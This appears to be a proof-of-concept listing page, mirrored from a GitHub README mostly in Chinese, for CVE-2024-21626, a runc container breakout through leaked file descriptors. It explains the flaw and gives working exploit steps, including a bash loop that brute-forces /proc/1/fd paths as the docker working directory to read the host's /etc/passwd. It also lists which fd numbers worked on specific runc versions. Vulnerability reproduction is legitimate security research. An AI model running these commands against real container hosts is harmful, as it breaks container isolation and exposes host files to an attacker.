CVE-2024-21626 PoC — runc container breakout through process.cwd trickery and leaked fds

Source

https://github.com/cdxiaodong/CVE-2024-21626

Associated Vulnerability

Title:runc container breakout through process.cwd trickery and leaked fds (CVE-2024-21626)
Description:runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from runc exec) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem ("attack 2"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through runc run ("attack 1"). Variants of attacks 1 and 2 could be also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes ("attack 3a" and "attack 3b"). runc 1.1.12 includes patches for this issue.

Description

CVE-2024-21626-poc-research-Reappearance-andtodo

Readme

利用: 

1.git clone https://github.com/cdxiaodong/CVE-2024-21626

2.docker-compose up

验证: 如果获取到宿主的/etc/passwd 即存在该漏洞

环境: runc: >=v1.0.0-rc93,<=1.1.11

攻击细节原理: 
在 runc 受影响版本中，由于在初始化过程中泄露了部分内部文件描述符，包括对宿主的 /sys/fs/cgroup 的句柄，同时 runc 未验证最终工作目录是否位于容器的挂载命名空间。攻击者可以修改 process.cwd 配置为 /proc/self/fd/7或者将宿主机调用runc exec时--cwd参数中传入的特定路径替换为/proc/self/fd/7/符号链接，进而让容器内的进程能够访问和操作宿主机的文件系统，从而绕过了容器的隔离机制。
更多细节(gif图片):


1. 攻击者使用自制的docker-poc包进行攻击利用 [CVE-2024-21626 runc process.cwd 和泄露的 fds 容器突破 |斯尼克 (snyk.io)](https://snyk.io/blog/cve-2024-21626-runc-process-cwd-container-breakout/)
3. 该docker-image尚未在公网开源 20240201
![img_v3_027l_c9651fc0-e6db-4524-9363-1e12fca4f8dg](https://github.com/cdxiaodong/CVE-2024-21626/assets/84082748/1cbd9a99-16be-4883-adf3-162fdc992696)
4. 官方源码修改逻辑: [Merge pull request from GHSA-xr7r-f8xq-vfvv · opencontainers/runc@0212048 (github.com)](https://github.com/opencontainers/runc/commit/02120488a4c0fc487d1ed2867e901eeed7ce8ecf)
5. [Runc 容易受到 Process.CWD 诡计和泄露的 FDS 的容器突破 ·CVE-2024-21626 ·GitHub 咨询数据库](https://github.com/advisories/GHSA-xr7r-f8xq-vfvv)

CVE: [CVE - CVE-2024-21626 (mitre.org)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-21626)
此漏洞的挖掘商: [CVE-2024-21626 runc process.cwd 和泄露的 fds 容器突破 |斯尼克 (snyk.io)](https://snyk.io/blog/cve-2024-21626-runc-process-cwd-container-breakout/)
![image](https://github.com/cdxiaodong/CVE-2024-21626/assets/84082748/bcf6e950-9cd6-45b2-a940-bf86e72b8b49)



实际的 fd 可能根据文件打开顺序而改变 可以使用以下脚本爆破使用


///
#!/bin/bash

for i in {3..10}
do
    # 使用变量构造工作目录，并运行容器
    docker run -w /proc/1/fd/$i ubuntu cat ../../../../../etc/passwd
done
///



本地测试成功:
fd/9 实现 runc-version: 1.1.10 1.1.2
![image](https://github.com/cdxiaodong/CVE-2024-21626/assets/84082748/06ef9bd1-fc76-46a9-9694-6f48c3b9fc8f)


runc --version 为1.0.0时 
![image](https://github.com/cdxiaodong/CVE-2024-21626/assets/84082748/34752d0c-4e3e-4ca1-8617-a024a0cee92a)



runc --version 为1.1.4时 fd/8实现
![image](https://github.com/cdxiaodong/CVE-2024-21626/assets/84082748/8bb43ed8-1821-4446-8f51-c64a7718c995)



今天刚出的洞
下面讲一下更多细节

可以有以下方法复现
1. runc - input 手动断点编译
2. ebpf监听runc打断点
3. runc create demo
runc exec demo ls /proc/1/fd -a 可以直接看到对应的符号链接
4. docker run -w /proc/1/fd/0-10 ubuntu cat ../../../../../etc/passwd 爆破



todo:
runc 断点获取df好实现自动化

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!